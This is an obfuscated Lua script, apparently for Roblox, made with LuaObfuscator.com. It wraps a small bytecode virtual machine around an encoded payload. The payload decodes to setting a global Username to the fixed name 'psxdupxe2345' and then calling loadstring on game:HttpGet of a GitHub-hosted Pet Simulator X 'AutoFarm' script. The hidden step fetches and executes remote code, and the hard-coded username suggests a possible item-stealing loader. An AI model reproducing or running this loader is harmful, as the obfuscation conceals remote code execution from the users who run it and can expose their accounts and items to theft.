--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.1) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (1==v18) then v21=function(v31,v32,v33)if v33 then local v73=(v31/(((92 + 771) -(252 + 609))^(v32-(1 + 0 + 0))))%((839 -(297 + 540))^(((v33-(2 -1)) -(v32-(2 -1))) + (73 -(40 + 32))));return v73-(v73%1);else local v74=(1 + 1)^(v32-1);return (((v31%(v74 + v74))>=v74) and (655 -(143 + 511))) or (0 + 0);end end;v22=nil;v22=function()local v39=v1(v16,v19,v19);v19=v19 + 1;return v39;end;v23=nil;v18=2;end if (0==v18) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v34)if (v1(v34,2)==79) then v20=v0(v3(v34,1,1));return "";else local v75=0;local v76;while true do if (v75==0) then v76=v2(v0(v34,16));if v20 then local v98=0;local v99;while true do if (v98==0) then v99=v5(v76,v20);v20=nil;v98=1;end if (v98==1) then return v99;end end else return v76;end break;end end end end);v21=nil;v18=1;end if (v18==2) then v23=function()local v40=0;local v41;local v42;while true do if ((0 -0)==v40) then v41,v42=v1(v16,v19,v19 + 2 + 0 + 0);v19=v19 + (1226 -(24 + 1200));v40=1402 -(915 + 486);end if ((98 -(53 + 44))==v40) then return (v42 * (84 + 172)) + v41;end end end;v24=nil;v24=function()local v43,v44,v45,v46=v1(v16,v19,v19 + (1589 -(24 + 1562)));v19=v19 + 4;return (v46 * 16777216) + (v45 * (21691 + 43845)) + (v44 * (691 -435)) + v43;end;v25=nil;v18=3;end if (v18==3) then v25=function()local v47=v24();local v48=v24();local v49=2 -1;local v50=(v21(v48,1 + 0,20) * ((1352 -(1334 + 16))^(91 -59))) + v47;local v51=v21(v48,29 -8,(140 -99) -(27 -17));local v52=((v21(v48,32)==(1 -0)) and  -(82 -(20 + 61))) or (1 + 0);if (v51==(0 + 0)) then if (v50==(0 + 0)) then return v52 * (1574 -((2004 -(181 + 296)) + 47));else local v77=167 -((822 -(567 + 240)) + 152);while true do if (v77==0) then v51=2 -1;v49=0 + 0;break;end end end elseif (v51==(1330 + 717)) then return ((v50==(0 + 0)) and (v52 * (((2 + 0) -1)/(81 -(23 + 14 + 44))))) or (v52 * NaN);end return v8(v52,v51-(2346 -1323)) * (v49 + (v50/((2 -(0 + 0))^(8 + 44))));end;v26=nil;v26=function(v35)local v53=0 + 0;local v54;local v55;while true do if ((0 -(0 -0))==v53) then v54=nil;if  not v35 then v35=v24();if (v35==(1185 -(895 + 290))) then return "";end end v53=1 + 0;end if (v53==(1 + 0)) then v54=v3(v16,v19,(v19 + v35) -((1766 -(249 + 1200)) -(29 + 287)));v19=v19 + v35;v53=1 + 1 + 0;end if (v53==(887 -(458 + 427))) then v55={};for v78=(2 -1) + 0, #v54 do v55[v78]=v2(v1(v3(v54,v78,v78)));end v53=1 + 2;end if (v53==(3 + 0)) then return v6(v55);end end end;v27=v24;v18=4;end if (v18==4) then v28=nil;v28=function(...)return {...},v12("#",...);end;v29=nil;v29=function()local v56=0 + 0;local v57;local v58;local v59;local v60;local v61;local v62;while true do local v66=0;while true do if (v66==(430 -(387 + 42))) then if (v56~=2) then else local v90=0 + 0;local v91;while true do if (v90~=(0 + 0)) then else v91=0;while true do if (v91==0) then for v111=1 + 0,v61 do local v112=0 -0;local v113;local v114;local v115;while true do if (v112==(2 -1)) then v115=nil;while true do if (v113==0) then v114=v22();v115=nil;v113=2 -1;end if (v113~=(392 -(76 + 315))) then else if (v114==(4 -3)) then v115=v22()~=0;elseif (v114==(1 + 1)) then v115=v25();elseif (v114==3) then v115=v26();end v62[v111]=v115;break;end end break;end if (v112==(1939 -(247 + 1692))) then v113=0 -0;v114=nil;v112=1 + 0;end end end v60[3]=v22();v91=2 -1;end if (v91~=(1 -0)) then else for v116=703 -(208 + 494),v24() do local v117=1125 -(957 + 168);local v118;local v119;local v120;while true do if (v117==0) then v118=0 -0;v119=nil;v117=4 -3;end if (v117==1) then v120=nil;while true do if (v118~=1) then else while true do if ((0 -0)~=v119) then else v120=v22();if (v21(v120,1791 -(812 + 978),1 + 0)~=0) then else local v156=0;local v157;local v158;local v159;while true do if (v156==(162 -(82 + 77))) then if (v21(v158,3,3)~=(1 + 0)) then else v159[3 + 1]=v62[v159[1916 -(538 + 1374)]];end v57[v116]=v159;break;end if (v156==(4 -2)) then local v171=0 -0;local v172;while true do if (v171==0) then v172=0 + 0;while true do if (v172==(0 -0)) then if (v21(v158,1,1 + 0)~=(2 -1)) then else v159[1876 -(522 + 1352)]=v62[v159[7 -5]];end if (v21(v158,2,425 -(392 + 31))~=(1 + 0)) then else v159[1 + 2]=v62[v159[1001 -(679 + 319)]];end v172=1;end if (v172==1) then v156=1461 -(1441 + 17);break;end end break;end end end if (v156==(1 + 0)) then local v173=0 -0;while true do if (v173==1) then v156=2;break;end if (v173==0) then v159={v23(),v23(),nil,nil};if (v157==(0 -0)) then local v184=1738 -(286 + 1452);local v185;local v186;local v187;while true do if (v184==0) then v185=0;v186=nil;v184=1;end if (v184==1) then v187=nil;while true do if (v185==(0 + 0)) then local v194=0 -0;while true do if (v194==0) then v186=0 -0;v187=nil;v194=1;end if (v194==(1783 -(1233 + 549))) then v185=1;break;end end end if ((956 -(179 + 776))~=v185) then else while true do if (v186==(0 + 0)) then v187=0 -0;while true do if (v187==0) then v159[3]=v23();v159[2 + 2]=v23();break;end end break;end end break;end end break;end end elseif (v157==1) then v159[3]=v24();elseif (v157==2) then v159[3]=v24() -(2^16);elseif (v157==(10 -7)) then local v195=0 -0;while true do if (v195==(840 -(772 + 68))) then v159[3]=v24() -(2^(14 + 2));v159[12 -8]=v23();break;end end end v173=1;end end end if (0~=v156) then else local v174=540 -(62 + 478);while true do if (v174~=0) then else v157=v21(v120,5 -3,1646 -(1326 + 317));v158=v21(v120,3 + 1,6);v174=1 + 0;end if (v174~=1) then else v156=354 -(170 + 183);break;end end end end end break;end end break;end if (v118==0) then local v147=0 + 0;while true do if (v147==(2 -1)) then v118=1 + 0;break;end if ((1720 -(916 + 804))==v147) then v119=0;v120=nil;v147=105 -(54 + 50);end end end end break;end end end v56=1425 -(136 + 1286);break;end end break;end end end if ((1736 -(1071 + 664))~=v56) then else local v92=0;while true do if (v92~=(1 + 0)) then else v62={};v56=2 -0;break;end if (v92==0) then v60={v57,v58,nil,v59};v61=v24();v92=4 -3;end end end break;end if (v66==(751 -(304 + 447))) then if (v56~=(0 -0)) then else local v93=0;while true do if (v93==(818 -(17 + 800))) then v59={};v56=1;break;end if (v93~=0) then else v57={};v58={};v93=1;end end end if (v56~=(4 -1)) then else local v94=0 -0;while true do if (v94==(1 + 0)) then return v60;end if (v94==(0 -0)) then for v106=1123 -(661 + 461),v24() do v58[v106-1]=v29();end for v108=1,v24() do v59[v108]=v24();end v94=1 + 0;end end end v66=1;end end end end;v18=5;end if (5==v18) then v30=nil;v30=function(v36,v37,v38)local v63=v36[1];local v64=v36[2];local v65=v36[3];return function(...)local v67=0;local v68;local v69;local v70;local v71;local v72;while true do if (v67==3) then A,B=v28(v11(v72));if  not A[1] then local v95=v36[4][v68] or "?";error("Script error at ["   .. v95   .. "]:"   .. A[2]);else return v13(A,2,B);end break;end if (v67==2) then v72=nil;v72=function()local v80=v63;local v81=v64;local v82=v65;local v83=v28;local v84={};local v85={};local v86={};for v96=0,v71 do if ((v96>=v82) or ((1797 -(1178 + 453))==(16871 -12519))) then v84[v96-v82]=v70[v96 + (79 -(52 + (114 -88)))];else v86[v96]=v70[v96 + (272 -(153 + 118))];end end local v87=(v71-v82) + 1 + 0;local v88;local v89;while true do local v97=0 -0;while true do if (((502 -(7 + 494))==v97) or ((1514 + 2668)>=(6124 -((916 -(77 + 522)) + 976)))) then if ((v89<=((3088 -1621) -(712 + 750))) or ((13001 -8196)<=(10890 -6947))) then if ((v89<=((15 -11) -2)) or ((466 -232)>1741)) then if ((v89<=(0 -0)) or ((7580 -2697)==((4936 -(252 + 168)) -(386 + 2431)))) then local v121=0;local v122;local v123;local v124;local v125;while true do if ((v121==(694 -(304 + 390))) or ((1892 -793)>2323)) then v122=0 + 0;v123=nil;v121=1 + 0;end if (((261 + 2462)>(603 + 198)) and (v121==(2 + 0))) then while true do if ((3148>(758 -555)) and ((0 + (769 -(74 + 695)))==v122)) then local v151=0;while true do if (((777 -(414 + 362))==v151) or (3493==1138)) then v122=1 + 0;break;end if ((2626==(4241 -(3434 -(1248 + 571)))) and (v151==(510 -(291 + 219)))) then v123=0 + 0;v124=nil;v151=1574 -(1107 + 466);end end end if ((v122==(1 -0)) or (1610<(1030 -(10 + 811)))) then v125=nil;while true do if ((v123==(1 -(0 + 0))) or ((24180 -19228)<(4277 + 271))) then v86[v124 + (1708 -(49 + (1678 -(16 + 4))))]=v125;v86[v124]=v125[v88[1 + 3]];break;end if (((3380 -1690)<(10456 -7267)) and ((1039 -(465 + (1744 -1170)))==v123)) then local v163=0;while true do if (((4698 -(595 + 1143))<=(10509 -5580)) and (v163==(0 -0))) then local v175=1087 -(513 + 574);while true do if (((2278 -1700)<(4651 -(309 + 1369))) and (v175==(575 -(550 + 25)))) then v124=v88[6 -4];v125=v86[v88[1539 -(599 + 937)]];v175=784 -(380 + 245 + 158);end if ((v175==(1 + 0)) or (2198>=(2884 + (3099 -1346)))) then v163=1;break;end end end if (((1 + 0 + 0)==v163) or ((2593 -(1385 + 67))>=(5825 -2981))) then v123=1 + 0;break;end end end end break;end end break;end if (((3192 -(726 + 821))==(191 + 1153 + 301)) and ((1 + 0)==v121)) then v124=nil;v125=nil;v121=1658 -(27 + 1629);end end elseif ((v89==((28 + 1717) -(706 + 778 + 260))) or ((9726 -(7446 -(341 + 1456)))<=(1784 -(298 + 279)))) then v86[v88[116 -(70 + 44)]][v88[8 -5]]=v86[v88[12 -(12 -4)]];elseif (((6255 -(592 + 909))>=(392 + 702)) and (v88[6 -4]==v86[v88[1 + 3]])) then v68=v68 + 1;else v68=v88[7 -4];end elseif ((v89<=(1360 -(1212 + 145))) or ((6197 -1571)<=(1633 -960))) then v86[v88[2 -0]]=v38[v88[1540 -(1257 + 280)]];elseif ((((2311 -1052) + (9191 -5490))>=3471) and (v89>((7836 -5979) -(752 + 1101)))) then local v137=0;local v138;local v139;while true do if (((3383 -2463)<(3773 + 799)) and (v137==(0 -0))) then local v150=0 -0;while true do if ((v150==((444 -(317 + 127)) + 0)) or (4268>=(3422 + 1139))) then v138=0;v139=nil;v150=1898 -(1799 + 98);end if ((v150==((1491 -(1488 + 2)) + 0)) or (644>=(693 + 1738))) then v137=1 + 0;break;end end end if ((v137==1) or ((6 + 6 + 0)>(1427 + 2639))) then while true do if ((v138==0) or ((4154 -2306)<=1243)) then v139=v88[1 + 1];v86[v139]=v86[v139](v13(v86,v139 + (515 -(161 + 353)),v69));break;end end break;end end else v68=v88[11 -8];end elseif ((v89<=(800 -(739 + 53))) or (4314<=(5477 -3793))) then if ((v89<=(84 -(36 + (60 -18)))) or ((382 + 2798)<(103 + 123 + 2854))) then local v128=0 + 0;local v129;local v130;local v131;local v132;local v133;local v134;while true do if (((8666 -6087)==2579) and (v128==(701 -(403 + 296)))) then v133=nil;v134=nil;v128=2 + 1;end if (((236 -82)<(2863 -(325 + 372))) and (v128==(3 -(2 -0)))) then v131=nil;v132=nil;v128=1086 -(771 + 313);end if ((v128==(0 -0)) or (3176>=(5992 -2787))) then v129=0 + 0;v130=nil;v128=1 -0;end if (((2090 -(13 + 1342))==(3206 -2471)) and (v128==3)) then while true do if ((v129==2) or ((2230 + 1530)<=(1700 -(142 + 37)))) then v134=nil;while true do if (((4729 -(499 + 96))<4549) and (v130==2)) then for v167=v131,v69 do local v168=0 + 0;local v169;while true do if ((v168==0) or (1122>=(5754 -2832))) then v169=635 -(106 + 529);while true do if (((6630 -2329)>(1 + 7)) and (v169==(0 -0))) then v134=v134 + (1 -0);v86[v167]=v132[v134];break;end end break;end end end break;end if (((5512 -((1715 -(215 + 200)) + 26))<4616) and (v130==0)) then local v164=0 -0;local v165;while true do if (((0 -(0 -0))==v164) or ((881 + 3063)<=(688 -(9 + 155)))) then v165=0 + 0;while true do if (((993 + 918)>(2059 -(269 + (2225 -(1190 + 338))))) and (v165==(2 -1))) then v130=1 + 0 + 0;break;end if ((v165==(502 -(17 + 277 + 208))) or ((6067 -(998 + 121))==((3133 + 2110) -3223))) then v131=v88[(1394 -673) -((2583 -(1223 + 768)) + 127)];v132,v133=v83(v86[v131](v13(v86,v131 + (2 -1),v88[3 + 0])));v165=930 -(570 + 359);end end break;end end end if (((1054 + (1520 -(90 + 481)))==(3871 -(1235 + 633))) and (v130==1)) then local v166=1573 -(382 + 1191);while true do if ((v166==(1 + 0)) or ((10396 -6544)<((4576 -2344) + 54))) then v130=962 -((2120 -(796 + 952)) + 588);break;end if ((v166==(0 + 0)) or ((1015 + 3698)>(4858 -(29 + 54 + 20)))) then local v176=0 -(0 -0);while true do if (((6020 -3835)>=(903 -(404 + 155))) and (v176==0)) then v69=(v133 + v131) -(1879 -(1232 + 646));v134=0;v176=1;end if ((v176==1) or ((2581 + (2560 -477))<=(8529 -5685))) then v166=988 -(160 + 11 + 816);break;end end end end end end break;end if (((8255 -6161)>(4099 -2534)) and (v129==1)) then local v152=0;while true do if ((v152==0) or (((4493 -(442 + 211)) -(1091 + 336))>=(1459 + 2572))) then v132=nil;v133=nil;v152=1;end if (((4375 -1304)>(583 -426)) and ((1 + 0)==v152)) then v129=2;break;end end end if (((5127 -(248 + 1057))==(2506 + (4139 -2823))) and (v129==(404 -(151 + 253)))) then local v153=0;while true do if ((v153==(71 -(49 + 21))) or ((13519 -9898)>(12018 -7373))) then v129=1;break;end if ((v153==(552 -(249 + 303))) or ((2825 + (3094 -(1658 + 297)))<((5585 -3221) -(799 + 817)))) then v130=0 + 0;v131=nil;v153=1 -0;end end end end break;end end elseif (((1315 + 2015)==(8820 -5490)) and (v89==(6 + 1))) then v86[v88[2]]=v88[2 + 1]~=(370 -((156 -51) + (434 -169)));else do return;end end elseif ((((558 -348) -(348 -194))<=(6870 -4259)) and (v89<=(778 -(139 + 157 + 472)))) then if ((((11662 -5923) -(712 + 1105))>=(224 + 2159)) and (v89==(5 + 4))) then v86[v88[2 + 0]]=v88[644 -(12 + 629)];else v86[v88[1278 -(388 + 888)]]();end elseif ((v89==(591 -(411 + 169))) or (3949<1247)) then if ((v86[v88[1 + 1]]==v88[1287 -(756 + 527)]) or ((6992 -(3129 -1087))<(4110 -1682))) then v68=v68 + 1;else v68=v88[3];end else for v144=v88[2],v88[5 -(2 + 0)] do v86[v144]=nil;end end v68=v68 + (3 -2);break;end if ((1925<(4781 -(1260 + 426))) and (v97==(0 -(1278 -(932 + 346))))) then v88=v80[v68];v89=v88[1696 -(182 + 1513)];v97=1;end end end end;v67=3;end if (v67==0) then v68=1;v69= -1;v67=1;end if (v67==1) then v70={...};v71=v12("#",...) -1;v67=2;end end end;end;return v30(v29(),{},v17)(...);end end end v15("LOL!083O00028O0003023O005F4703083O00557365726E616D65030C3O00707378647570786532333435030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034F3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F7665737479782F50657453696D756C61746F7258536372697074732F6D61696E2F4175746F4661726D2E6C756100173O0012093O00014O000C000100013O00260B3O000200010001002O043O00020001001209000100013O000E020001000500010001002O043O00050001001203000200023O001203000300043O001001000200030003001203000200053O001203000300063O00202O000300030007001209000500084O0007000600014O0006000300064O000500023O00022O000A000200010001002O043O00160001002O043O00050001002O043O00160001002O043O000200012O00083O00017O00173O00023O00033O00053O00053O00063O00083O00083O00093O00093O00093O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000B3O000C3O000E3O000F3O00113O00",v9(),...);end
